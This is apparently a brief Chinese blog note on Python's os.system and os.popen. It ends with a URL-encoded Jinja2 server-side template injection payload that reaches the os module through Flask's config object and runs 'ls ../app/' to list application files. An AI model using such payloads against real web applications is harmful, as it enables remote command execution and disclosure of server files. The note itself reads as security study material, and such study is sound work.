关于python常用的命令

os模块:

os.system

os.system("cat/cmd等...")

os.popen

print os.popen("adb shell ls ../aa.png").read() >>> 输出:aa.png

爆出包含文件

{{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../app/%27).read()%20}}

 

posted @ 2021-07-24 13:39  Dixk-BXy  阅读(70)  评论(0编辑  收藏  举报
Live2D